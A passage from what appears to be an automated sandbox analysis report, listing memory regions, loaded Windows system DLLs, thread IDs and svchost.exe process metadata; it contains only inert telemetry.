"c:\\windows\\syswow64\\dui70.dll") Region: id = 1444 start_va = 0x73b20000 end_va = 0x73b4efff entry_point = 0x73b20000 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\SysWOW64\\duser.dll" (normalized: "c:\\windows\\syswow64\\duser.dll") Region: id = 1481 start_va = 0x39b0000 end_va = 0x39b2fff entry_point = 0x0 region_type = private name = "private_0x00000000039b0000" filename = "" Region: id = 1482 start_va = 0x39c0000 end_va = 0x39c0fff entry_point = 0x0 region_type = private name = "private_0x00000000039c0000" filename = "" Region: id = 1483 start_va = 0x39f0000 end_va = 0x3a02fff entry_point = 0x0 region_type = private name = "private_0x00000000039f0000" filename = "" Region: id = 1484 start_va = 0x4090000 end_va = 0x40acfff entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 1485 start_va = 0x74c50000 end_va = 0x74ce5fff entry_point = 0x74c50000 region_type = mapped_file name = "msfeeds.dll" filename = "\\Windows\\SysWOW64\\msfeeds.dll" (normalized: "c:\\windows\\syswow64\\msfeeds.dll") Region: id = 1860 start_va = 0x3770000 end_va = 0x3770fff entry_point = 0x0 region_type = private name = "private_0x0000000003770000" filename = "" Region: id = 1861 start_va = 0x3a10000 end_va = 0x3a10fff entry_point = 0x0 region_type = private name = "private_0x0000000003a10000" filename = "" Region: id = 1862 start_va = 0x4070000 end_va = 0x408cfff entry_point = 0x0 region_type = private name = "private_0x0000000004070000" filename = "" Region: id = 1863 start_va = 0x4090000 end_va = 0x409efff entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 1864 start_va = 0x40b0000 end_va = 0x40b0fff entry_point = 0x0 region_type = private name = "private_0x00000000040b0000" filename = "" Region: id = 1865 start_va = 0x40c0000 end_va = 0x40c0fff entry_point = 0x0 region_type = private name = "private_0x00000000040c0000" filename = "" Region: id = 1866 start_va = 0x40d0000 end_va = 0x40f2fff entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 1867 start_va = 0x4b30000 end_va = 0x4bb5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b30000" filename = "" Region: id = 1868 start_va = 0x71640000 end_va = 0x7169efff entry_point = 0x71640000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll") Region: id = 2267 start_va = 0x39f0000 end_va = 0x39f3fff entry_point = 0x39f0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2268 start_va = 0x3a00000 end_va = 0x3a03fff entry_point = 0x3a00000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2269 start_va = 0x40a0000 end_va = 0x40a1fff entry_point = 0x0 region_type = private name = "private_0x00000000040a0000" filename = "" Region: id = 2270 start_va = 0x4bc0000 end_va = 0x4beffff entry_point = 0x4bc0000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000018.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db") Region: id = 2271 start_va = 0x4bf0000 end_va = 0x4c55fff entry_point = 0x4bf0000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 2272 start_va = 0x4c70000 end_va = 0x4cccfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c70000" filename = "" Region: id = 2273 start_va = 0x4cd0000 end_va = 0x4d0ffff entry_point = 0x0 region_type = private name = "private_0x0000000004cd0000" filename = "" Region: id = 2274 start_va = 0x4d10000 end_va = 0x4d20fff entry_point = 0x4d10000 region_type = mapped_file name = "c_20127.nls" filename = "\\Windows\\System32\\C_20127.NLS" (normalized: "c:\\windows\\system32\\c_20127.nls") Region: id = 2275 start_va = 0x4d70000 end_va = 0x4daffff entry_point = 0x0 region_type = private name = "private_0x0000000004d70000" filename = "" Region: id = 2276 start_va = 0x4dc0000 end_va = 0x4dfffff entry_point = 0x0 region_type = private name = "private_0x0000000004dc0000" filename = "" Region: id = 2277 start_va = 0x4ea0000 end_va = 0x4f9ffff entry_point = 0x0 region_type = private name = "private_0x0000000004ea0000" filename = "" Region: id = 2278 start_va = 0x4fe0000 end_va = 0x501ffff entry_point = 0x0 region_type = private name = "private_0x0000000004fe0000" filename = "" Region: id = 2279 start_va = 0x5020000 end_va = 0x511ffff entry_point = 0x0 region_type = private name = "private_0x0000000005020000" filename = "" Region: id = 2280 start_va = 0x5160000 end_va = 0x525ffff entry_point = 0x0 region_type = private name = "private_0x0000000005160000" filename = "" Region: id = 2281 start_va = 0x5360000 end_va = 0x545ffff entry_point = 0x0 region_type = private name = "private_0x0000000005360000" filename = "" Region: id = 2282 start_va = 0x73950000 end_va = 0x73966fff entry_point = 0x73951c9d region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 2283 start_va = 0x756f0000 end_va = 0x756f2fff entry_point = 0x756f0000 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\SysWOW64\\normaliz.dll" (normalized: "c:\\windows\\syswow64\\normaliz.dll") Region: id = 2284 start_va = 0x7ef83000 end_va = 0x7ef85fff entry_point = 0x0 region_type = private name = "private_0x000000007ef83000" filename = "" Region: id = 2285 start_va = 0x7ef86000 end_va = 0x7ef88fff entry_point = 0x0 region_type = private name = "private_0x000000007ef86000" filename = "" Region: id = 2286 start_va = 0x7ef89000 end_va = 0x7ef8bfff entry_point = 0x0 region_type = private name = "private_0x000000007ef89000" filename = "" Region: id = 2287 start_va = 0x7ef8c000 end_va = 0x7ef8efff entry_point = 0x0 region_type = private name = "private_0x000000007ef8c000" filename = "" Thread: id = 59 os_tid = 0x8f0 Thread: id = 61 os_tid = 0x910 Thread: id = 62 os_tid = 0x914 Thread: id = 63 os_tid = 0x954 Thread: id = 64 os_tid = 0x9d4 Thread: id = 65 os_tid = 0x368 Thread: id = 82 os_tid = 0xa84 Thread: id = 83 os_tid = 0x980 Thread: id = 84 os_tid = 0x44c Thread: id = 85 os_tid = 0x7fc Thread: id = 86 os_tid = 0xad4 Thread: id = 87 os_tid = 0xad0 Thread: id = 88 os_tid = 0xaa8 Thread: id = 89 os_tid = 0xa80 Thread: id = 91 os_tid = 0xa78 Thread: id = 153 os_tid = 0x130 Thread: id = 154 os_tid = 0x534 Thread: id = 155 os_tid = 0x7c8 Thread: id = 156 os_tid = 0x658 Process: id = "6" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x6f46000" os_pid = "0x3fc" os_integrity_level = "0x4000" os_privileges = "0x60801000" monitor_reason = "rpc_server" parent_id = "5" os_parent_pid = "0x8e0" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000ce7f" [0xc000000f], "LOCAL" [0x7] Region: id = 1053 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1054 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1055 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1056 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1057 start_va = 0x50000 end_va = 0x51fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1058 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1059 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 1060 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 1061 start_va = 0x90000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1062 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 1063 start_va = 0x210000 end_va = 0x276fff entry_point = 0x210000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1064 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 1065 start_va = 0x380000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 1066 start_va = 0x400000 end_va = 0x410fff entry_point = 0x400000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1067 start_va = 0x420000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 1068 start_va = 0x430000 end_va = 0x5b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 1069 start_va = 0x5c0000 end_va = 0x740fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1070 start_va = 0x750000 end_va = 0x80ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 1071 start_va = 0x810000 end_va = 0xc02fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 1072 start_va = 0xc10000 end_va = 0xc13fff entry_point = 0xc10000 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 1073 start_va = 0xc20000 end_va = 0xd1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 1074 start_va = 0xd20000 end_va = 0xd21fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d20000" filename = "" Region: id = 1075 start_va = 0xd30000 end_va = 0xdaffff entry_point = 0x0 region_type = private name = "private_0x0000000000d30000" filename = "" Region: id = 1076 start_va = 0xdb0000 end_va = 0xdb0fff entry_point = 0x0 region_type = private name = "private_0x0000000000db0000" filename = "" Region: id = 1077 start_va = 0xdc0000 end_va = 0xdc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000dc0000" filename = "" Region: id = 1078 start_va = 0xe00000 end_va = 0xe7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e00000" filename = "" Region: id = 1079 start_va = 0xf20000 end_va = 0x11eefff entry_point = 0xf20000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1080 start_va = 0x1240000 end_va = 0x12bffff entry_point = 0x0 region_type = private name = "private_0x0000000001240000" filename = "" Region: id = 1081 start_va = 0x12e0000 end_va = 0x135ffff entry_point = 0x0 region_type = private name = "private_0x00000000012e0000" filename = "" Region: id = 1082 start_va = 0x1360000 end_va = 0x145ffff entry_point = 0x0 region_type = private name = "private_0x0000000001360000" filename = "" Region: id = 1083 start_va = 0x14b0000 end_va = 0x152ffff entry_point = 0x0 region_type = private name = "private_0x00000000014b0000" filename = "" Region: id = 1084 start_va = 0x1530000 end_va = 0x15affff entry_point = 0x0 region_type = private name = "private_0x0000000001530000" filename = "" Region: id = 1085 start_va = 0x15d0000 end_va = 0x164ffff entry_point = 0x0 region_type = private name = "private_0x00000000015d0000" filename = "" Region: id = 1086 start_va = 0x1690000 end_va = 0x170ffff entry_point = 0x0 region_type = private name = "private_0x0000000001690000" filename = "" Region: id = 1087 start_va = 0x1780000 end_va = 0x17fffff entry_point = 0x0 region_type = private name = "private_0x0000000001780000" filename = "" Region: id = 1088 start_va = 0x1800000 end_va = 0x18bffff entry_point = 0x1800000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1089 start_va = 0x18c0000 end_va = 0x18cffff entry_point = 0x0 region_type = private name = "private_0x00000000018c0000" filename = "" Region: id = 1090 start_va = 0x1a30000 end_va = 0x1a3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a30000" filename = "" Region: id = 1091 start_va = 0x1a50000 end_va = 0x1acffff entry_point = 0x0 region_type = private name = "private_0x0000000001a50000" filename = "" Region: id = 1092 start_va = 0x1c00000 end_va = 0x1cfffff entry_point = 0x0 region_type = private name = "private_0x0000000001c00000" filename = "" Region: id = 1093 start_va = 0x1d10000 end_va = 0x1d8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d10000" filename = "" Region: id = 1094 start_va = 0x1db0000 end_va = 0x1e2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001db0000" filename = "" Region: id = 1095 start_va = 0x1e60000 end_va = 0x1edffff entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 1096 start_va = 0x1ff0000 end_va = 0x1ffffff entry_point = 0x0 region_type = private name = "private_0x0000000001ff0000" filename = "" Region: id = 1097 start_va = 0x2120000 end_va = 0x219ffff entry_point = 0x0 region_type = private name = "private_0x0000000002120000" filename = "" Region: id = 1098 start_va = 0x21f0000 end_va = 0x226ffff entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 1099 start_va = 0x2270000 end_va = 0x246ffff entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 1100 start_va = 0x2520000 end_va = 0x259ffff entry_point = 0x0 region_type = private name = "private_0x0000000002520000" filename = "" Region: id = 1101 start_va = 0x73b80000 end_va = 0x73b82fff entry_point = 0x73b80000 region_type = mapped_file name = "sfc.dll" filename = "\\Windows\\System32\\sfc.dll" (normalized: "c:\\windows\\system32\\sfc.dll") Region: id = 1102 start_va = 0x76fb0000 end_va = 0x770a9fff entry_point = 0x76fca2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1103 start_va = 0x770b0000 end_va = 0x771cefff entry_point = 0x770c5ea0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1104 start_va = 0x771d0000 end_va = 0x77378fff entry_point = 0x771d0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1105 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1106 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1107 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1108 start_va = 0xff9c0000 end_va = 0xff9cafff entry_point = 0xff9c0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1109 start_va = 0x7fef1260000 end_va = 0x7fef1277fff entry_point = 0x7fef1260000 region_type = mapped_file name = "vmictimeprovider.dll" filename = "\\Windows\\System32\\vmictimeprovider.dll" (normalized: "c:\\windows\\system32\\vmictimeprovider.dll") Region: id = 1110 start_va = 0x7fef1280000 end_va = 0x7fef12dffff entry_point = 0x7fef1280000 region_type = mapped_file name = "w32time.dll" filename = "\\Windows\\System32\\w32time.dll" (normalized: "c:\\windows\\system32\\w32time.dll") Region: id = 1111 start_va = 0x7fef3510000 end_va = 0x7fef35e7fff entry_point = 0x7fef3510000 region_type = mapped_file name = "perftrack.dll" filename = "\\Windows\\System32\\perftrack.dll" (normalized: "c:\\windows\\system32\\perftrack.dll") Region: id = 1112 start_va = 0x7fef3a40000 end_va = 0x7fef3a4bfff entry_point = 0x7fef3a4602c region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 1113 start_va = 0x7fef43a0000 end_va = 0x7fef43a7fff entry_point = 0x7fef43a1414 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1114 start_va = 0x7fef4cf0000 end_va = 0x7fef4d6bfff entry_point = 0x7fef4cf0000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 1115 start_va = 0x7fef5fa0000 end_va = 0x7fef5faffff entry_point = 0x7fef5fa0000 region_type = mapped_file name = "sfc_os.dll" filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll") Region: id = 1116 start_va = 0x7fef5fb0000 end_va = 0x7fef5fc1fff entry_point = 0x7fef5fb0000 region_type = mapped_file name = "aepic.dll" filename = "\\Windows\\System32\\aepic.dll" (normalized: "c:\\windows\\system32\\aepic.dll") Region: id = 1117 start_va = 0x7fef73d0000 end_va = 0x7fef73e8fff entry_point = 0x7fef73d0000 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 1118 start_va = 0x7fef7440000 end_va = 0x7fef74a3fff entry_point = 0x7fef7441254 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 1119 start_va = 0x7fef74b0000 end_va = 0x7fef7520fff entry_point = 0x7fef74b1010 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1120 start_va = 0x7fef77a0000 end_va = 0x7fef7813fff entry_point = 0x7fef77a66f0 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 1121 start_va = 0x7fefab80000 end_va = 0x7fefab97fff entry_point = 0x7fefab81bf8 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1122 start_va = 0x7fefaba0000 end_va = 0x7fefabb0fff entry_point = 0x7fefaba16ac region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1123 start_va = 0x7fefabd0000 end_va = 0x7fefac22fff entry_point = 0x7fefabd2b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1124 start_va = 0x7fefad00000 end_va = 0x7fefad09fff entry_point = 0x7fefad00000 region_type = mapped_file name = "nsisvc.dll" filename = "\\Windows\\System32\\nsisvc.dll" (normalized: "c:\\windows\\system32\\nsisvc.dll") Region: id = 1125 start_va = 0x7fefad20000 end_va = 0x7fefad2afff entry_point = 0x7fefad21198 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1126 start_va = 0x7fefad30000 end_va = 0x7fefad56fff entry_point = 0x7fefad398bc region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1127 start_va = 0x7fefada0000 end_va = 0x7fefae06fff entry_point = 0x7fefadb6060 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1128 start_va = 0x7fefae20000 end_va = 0x7fefae2bfff entry_point = 0x7fefae20000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 1129 start_va = 0x7fefaea0000 end_va = 0x7fefaeb4fff entry_point = 0x7fefaea60d8 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1130 start_va = 0x7fefb400000 end_va = 0x7fefb418fff entry_point = 0x7fefb40177c region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 1131 start_va = 0x7fefb420000 end_va = 0x7fefb434fff entry_point = 0x7fefb4212a0 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 1132 start_va = 0x7fefb490000 end_va = 0x7fefb49afff entry_point = 0x7fefb4912e0 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 1133 start_va = 0x7fefb610000 end_va = 0x7fefb627fff entry_point = 0x7fefb611130 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 1134 start_va = 0x7fefc2e0000 end_va = 0x7fefc2ebfff entry_point = 0x7fefc2e1064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1135 start_va = 0x7fefc3b0000 end_va = 0x7fefc3b6fff entry_point = 0x7fefc3b14b0 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 1136 start_va = 0x7fefc4a0000 end_va = 0x7fefc4bafff entry_point = 0x7fefc4a2068 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1137 start_va = 0x7fefc4c0000 end_va = 0x7fefc4ddfff entry_point = 0x7fefc4c13b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1138 start_va = 0x7fefc610000 end_va = 0x7fefc619fff entry_point = 0x7fefc613cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 1139 start_va = 0x7fefc710000 end_va = 0x7fefc756fff entry_point = 0x7fefc711064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1140 start_va = 0x7fefc800000 end_va = 0x7fefc82ffff entry_point = 0x7fefc800000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 1141 start_va = 0x7fefc830000 end_va = 0x7fefc88afff entry_point = 0x7fefc836940 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1142 start_va = 0x7fefc9a0000 end_va = 0x7fefc9a6fff entry_point = 0x7fefc9a142c region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 1143 start_va = 0x7fefc9b0000 end_va = 0x7fefca04fff entry_point = 0x7fefc9b1054 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1144 start_va = 0x7fefca10000 end_va = 0x7fefca26fff entry_point = 0x7fefca132b8 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1145 start_va = 0x7fefcc70000 end_va = 0x7fefcc83fff entry_point = 0x7fefcc70000 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 1146 start_va = 0x7fefcfb0000 end_va = 0x7fefcfbafff entry_point = 0x7fefcfb1030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1147 start_va = 0x7fefcfe0000 end_va = 0x7fefd004fff entry_point = 0x7fefcfe9658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1148 start_va = 0x7fefd010000 end_va = 0x7fefd01efff entry_point = 0x7fefd011010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1149 start_va = 0x7fefd020000 end_va = 0x7fefd0b0fff entry_point = 0x7fefd021440 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1150 start_va = 0x7fefd100000 end_va = 0x7fefd113fff entry_point = 0x7fefd1010e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1151 start_va = 0x7fefd120000 end_va = 0x7fefd12efff entry_point = 0x7fefd1219b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1152 start_va = 0x7fefd2b0000 end_va = 0x7fefd31afff entry_point = 0x7fefd2b30e0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1153 start_va = 0x7fefd550000 end_va = 0x7fefd618fff entry_point = 0x7fefd5ca874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1154 start_va = 0x7fefd620000 end_va = 0x7fefd6f6fff entry_point = 0x7fefd623274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1155 start_va = 0x7fefd700000 end_va = 0x7fefd7dafff entry_point = 0x7fefd720760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1156 start_va = 0x7fefdb60000 end_va = 0x7fefdbacfff entry_point = 0x7fefdb61070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1157 start_va = 0x7fefdbb0000 end_va = 0x7fefdbddfff entry_point = 0x7fefdbb1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1158 start_va = 0x7fefde40000 end_va = 0x7fefe042fff entry_point = 0x7fefde63330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1159 start_va = 0x7fefe220000 end_va = 0x7fefe2b8fff entry_point = 0x7fefe221c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1160 start_va = 